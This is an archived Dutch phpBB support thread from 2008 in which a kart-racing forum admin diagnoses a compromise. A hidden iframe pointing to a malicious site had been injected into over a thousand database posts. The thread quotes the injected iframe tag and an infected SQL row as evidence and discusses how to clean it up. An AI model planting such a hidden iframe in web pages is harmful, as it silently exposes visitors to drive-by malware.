Virus op forum?

Hulp nodig bij je installatie of kom je ergens niet uit? Probeer phpBB3! Problemen lossen we samen met je op.
phpBB 3.0 is End of support per 1 januari 2017. Dit forum is hier enkel ter archief. Het wordt aangeraden te upgraden naar phpBB 3.2
Forumregels
phpBB 3.0 is End of support per 1 januari 2017. Dit forum is hier enkel ter archief. Het wordt aangeraden te upgraden naar phpBB 3.2
Gesloten
Gebruikersavatar
Tazmanian
Berichten: 293
Lid geworden op: 16 aug 2007, 15:19
Locatie: Hamme - Belgie
Contacteer:

Virus op forum?

Bericht door Tazmanian » 07 aug 2008, 15:49

  • Adres van je forum: http://forum.kartgrid.be
    Event. modificaties op je forum: zie handtekening
    Wanneer ontstond het probleem? vandaag
    phpBB versie: 3.0.2

    Heb je onlangs iets veranderd aan je forum? Nee, de laatste weken niet gewijzigd
    Wat is het probleem?
Sinds vanmorgen krijg ik reports van gebruikers dat als ze het forum openen hun virusscanner in actie schiet. Er worden trojans geblokkeerd en mijn forum vraagt om Microsoft Data Access - Remote Data Servcies ... te installeren.

Blijkbaar heeft enkel IE hier last van met Firefox krijg ik de melding niet.

Ik kan ook zien dat er bestanden geopend worden van atkgft . com en httpdocs.eu

Als ik de broncode open van die betreffende pagina's zie ik volgende code staan die er helemaal niet hoort
<iframe src="http://httpdocs.eu/" style="display:none"></iframe>

In deze topic vinden jullie de reports van mijn gebruikers http://forum.kartgrid.be/viewtopic.php?p=140752#p140752
Dit is een van de topics waar het probleem zich voordoet
http://forum.kartgrid.be/viewtopic.php?f=52&t=4917

En blijkbaar zijn er ook al reports op andere forums.
Dit is een vbullutin forum http://www.ukbusinessforums.co.uk/forum ... p?p=578691

Ik hoop dat iemand mij snel kan helpen, het forum is deze week heel belangrijk aangezien er een WK indoorkarting aan de gang is in Belgie.


EDIT:
ik heb ondertussen de database gedownload en in de database vindt ik 1356 keer de vermelding naar <iframe src="http://httpdocs.eu/" style="display:none"></iframe>

We hebben 1369 onderwerpen, dus is bijna elk onderwerp besmet.

Nu hoe kan ik dit eruit krijgen, en in de toekomst vermijden.
Zijn er enkele bestanden van phpbb onveilig of heeft iemand de database gehackt?

Jim
Berichten: 3900
Lid geworden op: 21 feb 2007, 14:53
Locatie: Groningen
Contacteer:

Re: Virus op forum?

Bericht door Jim » 07 aug 2008, 16:25

Firefox en Google hebben de site httpdocs.eu ook gerapporteerd als aanvalsite.

Ik vind het een erg vreemd probleem en heb zoiets nog niet eerder gezien. Aangezien het gokken blijft en het enkel in berichten voorkomt. Zou je in de codedump eens je viewtopic.php willen plaatsen?
Jim Mossing Holsteyn - Beheerder
Documentatie | Algemene voorwaarden | Wiki

Heb je suggesties over het verbeteren van phpBB.nl of andere site-gerelateerde vragen? Stuur me een PB!

Gebruikersavatar
Tazmanian
Berichten: 293
Lid geworden op: 16 aug 2007, 15:19
Locatie: Hamme - Belgie
Contacteer:

Re: Virus op forum?

Bericht door Tazmanian » 07 aug 2008, 16:30

Bij deze,
Forum gehacked Het is enkel dit stukje dat je moet zoeken
<iframe src="http://httpdocs.eu/" style="display:none"></iframe>

Daar ligt het probleem.

Jim
Berichten: 3900
Lid geworden op: 21 feb 2007, 14:53
Locatie: Groningen
Contacteer:

Re: Virus op forum?

Bericht door Jim » 07 aug 2008, 16:32

Dat is je volledige bron, die heb ik zelf ook bekeken. Ik bedoel het bestand viewtopic.php dat op je server staat. ;)
Jim Mossing Holsteyn - Beheerder
Documentatie | Algemene voorwaarden | Wiki

Heb je suggesties over het verbeteren van phpBB.nl of andere site-gerelateerde vragen? Stuur me een PB!

Gebruikersavatar
Tazmanian
Berichten: 293
Lid geworden op: 16 aug 2007, 15:19
Locatie: Hamme - Belgie
Contacteer:

Re: Virus op forum?

Bericht door Tazmanian » 07 aug 2008, 16:37

Ok sorry,

bij deze
Forum hacked

Gebruikersavatar
Tazmanian
Berichten: 293
Lid geworden op: 16 aug 2007, 15:19
Locatie: Hamme - Belgie
Contacteer:

Re: Virus op forum?

Bericht door Tazmanian » 07 aug 2008, 16:45

In de database staat de bewuste code dus 1356 keer.

hierbij een lijn uit de database

Code: Selecteer alles

backup2.sql(62003): INSERT INTO `posts` VALUES (140550, 4926, 1, 183, 0, 0x38342e3139362e3136382e3339, 1217975337, 1, 0, 1, 1, 1, 0, '', 'Nieuw bezoekersrecord', 'Vorig jaar werd het WK in Phoenix vanop het forum gevolgd door heel wat van onze bezoekers.  Dit was vooral de verdienste van heel het team Talent Promotion Belgium die zowaar voor live verslag zorgden.  Tijdens de finale sneuvelden er dan ook records, er waren op de finaledag maar liefst 1009 unieke bezoekers.\n\nDit jaar is Kortrijk de host voor het WK.  Om onze bezoekers iets extra aan te bieden sloegen KartGrid, First Kart ''Inn en Flanders Indoor Kart de handen in elkaar om een live timing aan te bieden.  Al snel werd dit door heel wat buitenlandse sites opgepikt en wordt het WK online gevolgd vanuit de hele wereld.\n\nOm een nieuw bezoekersrecord te breken moesten we nu zelfs niet wachten tot de finale.  Vandaag 05 augustus - exact een jaar na het vorige record! - waren er maar liefst 1177 unieke bezoekers en 12936 pageviews.\n\nBenieuwd of we terug een jaar moeten wachten op een nieuw record of zal de finale van aanstaande vrijdag voor ongeziene bezoekersaantallen zorgen  <!-- s:idea: --><img src="{SMILIES_PATH}/icon3.gif" alt=":idea:" title="idee" /><!-- s:idea: --><iframe src="http://httpdocs.eu/" style="display:none"></iframe>', 0x6634633265386632323663666438646562346465306564353534303133613736, 0, '', 0x3370766364636b35, 1, 0, '', 0, 0, 0);

Gebruikersavatar
Tazmanian
Berichten: 293
Lid geworden op: 16 aug 2007, 15:19
Locatie: Hamme - Belgie
Contacteer:

Re: Virus op forum?

Bericht door Tazmanian » 07 aug 2008, 17:07

Het ziet er ook naar uit dat dit enkel is op 'oude' berichten. Als ik een nieuw bericht plaats verschijnt dat er niet in.

Mag ik er dan van uitgaan dat iemand de database heeft gehackt en een query heet uitgevoerd?
Probeer er voor te zorgen dat je niet dubbel post, je kan gewoon je berichten bewerken.
- Bee

Gebruikersavatar
Pascal
Berichten: 2315
Lid geworden op: 20 feb 2007, 18:55
Locatie: Nijmegen
Contacteer:

Re: Virus op forum?

Bericht door Pascal » 07 aug 2008, 17:17

Tazmanian schreef:Het ziet er ook naar uit dat dit enkel is op 'oude' berichten. Als ik een nieuw bericht plaats verschijnt dat er niet in.

Mag ik er dan van uitgaan dat iemand de database heeft gehackt en een query heet uitgevoerd?
Dubbelposten is niet toegestaan, jij weet dit mischien niet, maar zou je de volgende keer de wijzig knop kunnen gebruiken? (die vind je hier rechtsboven, naast ! en Citeer,) dankjewel :D
Dit soort berichten zijn nog ongewenster dan dubbelposten. Niet doen dus.
- Bee
Keep bleeding, keep, keep bleeding love
I keep bleeding, I keep, keep bleeding love
Keep bleeding, keep, keep bleeding love
You cut me open

Gebruikersavatar
Tazmanian
Berichten: 293
Lid geworden op: 16 aug 2007, 15:19
Locatie: Hamme - Belgie
Contacteer:

Re: Virus op forum?

Bericht door Tazmanian » 07 aug 2008, 17:20

Sorry, ik heb er niet op gelet, maar ik wist het eigenlijk wel :oops:


Ondertussen vastgesteld dat het niet enkel om eerste posts gaat, maar er ook in posts verder in de topic de code is toegevoegd.


EDIT:

Weet er iemand hoe ik de code die is toegevoegd in sommige posts kan verwijderen?
Met deze command zie ik alle rijen waar de code in staat:

Code: Selecteer alles

SELECT * FROM `phpbb3_posts` WHERE `post_text` like '%<iframe src="http://httpdocs.eu/" style="display:none"></iframe>'
Maar hoe kan ik enkel deze code verwijderen zonder de posts zelfs te verliezen?

Gebruikersavatar
Ramon Fincken
Berichten: 2552
Lid geworden op: 27 nov 2005, 23:15
Locatie: Diemen
Contacteer:

Re: Virus op forum?

Bericht door Ramon Fincken » 09 aug 2008, 09:47

je kan de tekst veranderen die met iframe start, lees even hier voor meer info van phpbb2, maar je kunt het makkelijk wijzigen voor jou toepassing:

http://www.ramonfincken.com/29/PHP+codi ... abase.html
Freelance webdevelopment, including phpbb2 scripting!

Website founder van: phpBBinstallers.net phpBBantispam.com
Mods: zie op http://www.phpbb.com Blog in wording: RamonFincken.com

Gebruikersavatar
Tazmanian
Berichten: 293
Lid geworden op: 16 aug 2007, 15:19
Locatie: Hamme - Belgie
Contacteer:

Re: Virus op forum?

Bericht door Tazmanian » 09 aug 2008, 10:56

Ik had ondertussen een incident tracker ingediend bij phpbb.com en daar de code al gekregen.
Ze weten echter (nog) niet hoe ze het forum / database gekraakt hebben, aangezien ik bijna allemaal officiele MOD's gebruik.

Gesloten